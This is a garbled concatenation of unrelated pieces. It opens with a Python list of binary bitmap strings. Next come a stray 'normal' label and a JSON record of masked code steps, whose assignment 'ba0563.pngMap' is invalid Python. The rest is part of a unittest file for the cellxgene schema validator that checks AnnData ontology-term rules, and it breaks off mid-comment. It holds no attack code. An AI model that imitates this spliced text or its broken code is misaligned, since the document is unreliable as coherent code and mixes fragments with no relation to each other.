'00000000000000000000000000000000000000000000000000000000000000000000001100110111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000001111111111111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000111111111111111111110000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000111111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111100000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111100000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000001111111111100000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000111101011100000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
]
|
normal
|
{
"blob_id": "dab1adcd185092fc425b5d87150f27e7b67bff6c",
"index": 151,
"step-1": "<mask token>\n",
"step-2": "ba0563.pngMap = [\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000011111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000001100110111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000001111111111111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000111111111111111111110000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000111111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111100000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111100000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000001111111111100000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000111101011100000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ,\n '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n ]\n",
"step-3": "ba0563.pngMap = [\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000011111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000001100110111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000001111111111111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000111111111111111111111110000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000111111111111111111110000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000011111111111111111110000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000111111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111100000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111100000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111110000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111100000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111110000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111100000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111111000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000011111111111111111000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000001111111111100000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000111101011100000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',\n]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import unittest
import numpy
import pandas as pd
import fixtures.examples_validate as examples
from cellxgene_schema.validate import Validator
from cellxgene_schema.write_labels import AnnDataLabelAppender
# Tests for schema compliance of an AnnData object
class TestValidAnndata(unittest.TestCase):
"""
Tests a valid AnnData object. Most other tests below modify this AnnData object and test for failure cases.
The valid AnnData object has all valid cases described in the schema.
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_valid_anndata(self):
self.validator.validate_adata()
self.assertFalse(self.validator.errors)
class TestH5adValidation(unittest.TestCase):
"""
Checks that validation from h5ad works, only does one invalid example as extensive testing is done in the classes
below
"""
def setUp(self):
self.h5ad_valid_file = examples.h5ad_valid
self.h5ad_invalid_file = examples.h5ad_invalid
self.validator = Validator()
def test_validate(self):
# Valid h5ad
self.assertTrue(self.validator.validate_adata(self.h5ad_valid_file))
# Invalid h5ads
self.assertFalse(self.validator.validate_adata(self.h5ad_invalid_file))
class TestExpressionMatrix(unittest.TestCase):
"""
Fail cases for expression matrices (anndata.X and anndata.raw.X)
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_shapes(self):
"""
All matrix layers MUST have the same shape, and have the same cell labels and gene labels.
"""
# Creates a raw layer
self.validator.adata.raw = self.validator.adata
self.validator.adata.raw.var.drop("feature_is_filtered", axis=1, inplace=True)
self.validator.adata.X = examples.adata_non_raw.X.copy()
self.validator.adata.uns["X_normalization"] = "CPM"
# remove one gene
self.validator.adata = self.validator.adata[:, 1:]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
["ERROR: Number of genes in X (3) is different than raw.X (4)."],
)
def test_sparsity(self):
"""
In any layer, if a matrix has 50% or more values that are zeros, it is STRONGLY RECOMMENDED that
the matrix be encoded as a scipy.sparse.csr_matrix
"""
self.validator.adata.X = self.validator.adata.X.toarray()
self.validator.validate_adata()
self.assertEqual(
self.validator.warnings,
[
"WARNING: Sparsity of 'X' is 0.875 which is greater than 0.5, "
"and it is not a 'scipy.sparse.csr_matrix'. It is "
"STRONGLY RECOMMENDED to use this type of matrix for "
"the given sparsity."
],
)
def test_raw_existence(self):
"""
Except for ATAC-seq and methylation data, raw data is REQUIRED
"""
# RNA - raw layer required
del self.validator.adata.raw
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Raw data is missing: there is no 'raw.X' and 'X_normalization' is not 'none'."
],
)
# ATAC - raw layer not required
# The assignment above makes X to not be raw: self.validator.adata.uns["X_normalization"] = "CPM"
# The following line makes it to be scATAC-seq data (EFO:0010891)
# Missing raw data in atac-seq data is allowed, thus the following should not return an error message
self.validator.errors = []
self.validator.adata.obs["assay_ontology_term_id"] = "EFO:0010891"
self.validator.validate_adata()
self.assertEqual(self.validator.errors, [])
def test_final_strongly_recommended(self):
"""
Except for ATAC-seq and methylation data, final matrix is STRONGLY RECOMMENDED
"""
# move raw to X amd: i.e. there is no final
self.validator.adata.X = self.validator.adata.raw.X
del self.validator.adata.raw
self.validator.adata.uns["X_normalization"] = "none"
self.validator.validate_adata()
self.assertEqual(
self.validator.warnings,
[
"WARNING: Only raw data was found, i.e. there is no 'raw.X' and 'uns['X_normalization']' is 'none'. "
"It is STRONGLY RECOMMENDED that 'final' (normalized) data is provided."
],
)
class TestObs(unittest.TestCase):
"""
Fail cases in adata.uns
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_column_presence(self):
"""
obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.
"""
columns = [
"assay_ontology_term_id",
"development_stage_ontology_term_id",
"disease_ontology_term_id",
"ethnicity_ontology_term_id",
"is_primary_data",
"sex_ontology_term_id",
"tissue_ontology_term_id",
]
for column in columns:
with self.subTest(column=column):
self.validator.errors = []
self.validator.adata = examples.adata.copy()
self.validator.adata.obs.drop(column, axis=1, inplace=True)
# Remove batch condition because it has a dependency with is_primary_data
self.validator.adata.uns.pop("batch_condition")
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[f"ERROR: Dataframe 'obs' is missing " f"column '{column}'."],
)
def test_column_presence_organism(self):
"""
obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.
A separate check is need for organism_ontology_term_id because removing from anndata results in multiple
errors given that other columns depend on its presence
"""
self.validator.adata.obs.drop("organism_ontology_term_id", axis=1, inplace=True)
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Dataframe 'obs' is missing column "
"'organism_ontology_term_id'.",
"ERROR: Checking values with dependencies failed for "
"adata.obs['ethnicity_ontology_term_id'], this is likely due "
"to missing dependent column in adata.obs.",
"ERROR: Checking values with dependencies failed for "
"adata.obs['development_stage_ontology_term_id'], this is likely due "
"to missing dependent column in adata.obs.",
],
)
def test_obsolete_term_id(self):
"""
Terms documented as obsolete in an ontology MUST NOT be used. For example, EFO:0009310
for obsolete_10x v2 was marked as obsolete in EFO version 3.31.0 and replaced by
EFO:0009899 for 10x 3' v2.
https://www.ebi.ac.uk/ols/ontologies/efo/terms?short_form=EFO_0009310
"""
# Not a valid term
self.validator.adata.obs["assay_ontology_term_id"][0] = "EFO:0009310"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is a deprecated term id of 'EFO'.",
"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is not a child term id "
"of '[['EFO:0002772', 'EFO:0010183']]'.",
],
)
def test_assay_ontology_term_id(self):
"""
assay_ontology_term_id categorical with str categories.
This MUST be an EFO term and either child of "EFO:0002772" or "EFO:0010183"
If there is not an exact match for the assay, clarifying text MAY be enclosed in parentheses and appended to
the most accurate term. For example, the sci-plex assay could be curated as "EFO:0010183 (sci-plex)"
"""
# Not a valid term
self.validator.adata.obs["assay_ontology_term_id"][0] = "CL:000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a valid "
"ontology term id of 'EFO'.",
"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a child "
"term id of '[['EFO:0002772', 'EFO:0010183']]'.",
],
)
# Not a valid child
self.validator.adata.obs["assay_ontology_term_id"][0] = "EFO:0000001"
self.validator.errors = []
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'assay_ontology_term_id' is not a "
"child term id of '[['EFO:0002772', 'EFO:0010183']]'."
],
)
# Not a clarifying text
self.validator.adata.obs["assay_ontology_term_id"][0] = "EFO:0010183 sci-plex"
self.validator.errors = []
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.",
"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a child term id of "
"'[['EFO:0002772', 'EFO:0010183']]'.",
],
)
def test_cell_type_ontology_term_id(self):
"""
cell_type_ontology_term_id categorical with str categories. This MUST be a CL term.
"""
# Not a valid term
self.validator.adata.obs["cell_type_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'cell_type_ontology_term_id' is not a valid "
"ontology term id of 'CL'."
],
)
def test_development_stage_ontology_term_id_human(self):
"""
development_stage_ontology_term_id categorical with str categories. If unavailable, this MUST be "unknown".
If organism_ontolology_term_id is "NCBITaxon:9606" for Homo sapiens,
this MUST be the most accurate HsapDv term.
"""
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:9606"
self.validator.adata.obs["development_stage_ontology_term_id"][
0
] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is "
"not a valid ontology term id of 'HsapDv'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' "
"(Homo sapiens), 'development_stage_ontology_term_id' MUST be a term id of 'HsapDv' or unknown."
],
)
def test_development_stage_ontology_term_id_mouse(self):
"""
If organism_ontolology_term_id is "NCBITaxon:10090" for Mus musculus,
this MUST be the most accurate MmusDv term
"""
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:10090"
self.validator.adata.obs["development_stage_ontology_term_id"][
0
] = "EFO:0000001"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "na"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is "
"not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' "
"(Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown."
],
)
def test_development_stage_ontology_term_id_all_species(self):
"""
All other it MUST be children of UBERON:0000105 and not UBERON:0000071
"""
# Fail case not an UBERON term
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:10114"
self.validator.adata.obs["development_stage_ontology_term_id"][
0
] = "EFO:0000001"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "na"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is "
"not a valid ontology term id of 'UBERON'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' "
"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of "
"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.",
"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not "
"a child term id of '[['UBERON:0000105']]'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' "
"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of "
"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.",
],
)
# All other it MUST be children of UBERON:0000105 and not UBERON:0000071
# Fail case UBERON:0000071
self.validator.errors = []
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:10114"
self.validator.adata.obs["development_stage_ontology_term_id"][
0
] = "UBERON:0000071"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "na"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'UBERON:0000071' in 'development_stage_ontology_term_id' is not allowed'. When "
"'organism_ontology_term_id' is not 'NCBITaxon:10090' "
"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of "
"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.",
],
)
def test_disease_ontology_term_id(self):
"""
disease_ontology_term_id categorical with str categories. This MUST be a MONDO term or
PATO:0000461 for normal or healthy.
"""
# Invalid ontology
self.validator.adata.obs["disease_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'disease_ontology_term_id' is not a "
"valid ontology term id of 'MONDO, PATO'. Only 'PATO:0000461' is allowed for 'PATO' term ids."
],
)
# Invalid PATO term id
self.validator.errors = []
self.validator.adata.obs["disease_ontology_term_id"][0] = "PATO:0001894"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'PATO:0001894' in 'disease_ontology_term_id' is not an allowed term: '[['PATO:0000461']]'. "
"Only 'PATO:0000461' is allowed for 'PATO' term ids."
],
)
def test_ethnicity_ontology_term_id(self):
"""
ethnicity_ontology_term_id categorical with str categories.
If organism_ontolology_term_id is "NCBITaxon:9606" for Homo sapiens,
this MUST be either a HANCESTRO term or "unknown" if unavailable.
Otherwise, for all other organisms this MUST be "na".
"""
# If organism_ontolology_term_id is "NCBITaxon:9606" for Homo sapiens,
# this MUST be either a HANCESTRO term or "unknown" if unavailable.
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:9606"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is "
"not a valid ontology term id of 'HANCESTRO'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' "
"(Homo sapiens), ethnicity_ontology_term_id MUST be a term id of 'HANCESTRO' or 'unknown'."
],
)
# Otherwise, for all other organisms this MUST be "na". Below is the test case for mouse data.
# development_stage_ontology_term_id has to be set to an appropriate mouse term id, otherwise there
# will be an error in that field.
self.validator.errors = []
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:10090"
self.validator.adata.obs["development_stage_ontology_term_id"][
0
] = "MmusDv:0000003"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is not a "
"valid value of 'ethnicity_ontology_term_id'. When 'organism_ontology_term_id' is NOT 'NCBITaxon:9606' "
"(Homo sapiens), ethnicity_ontology_term_id MUST be 'na'."
],
)
def test_organism_ontology_term_id(self):
"""
organism_ontology_term_id categorical with str categories. This MUST be a child of NCBITaxon:33208.
"""
# Setting "organism_ontology_term_id" to "EFO:0000001" is the fail case. However since this represents neither
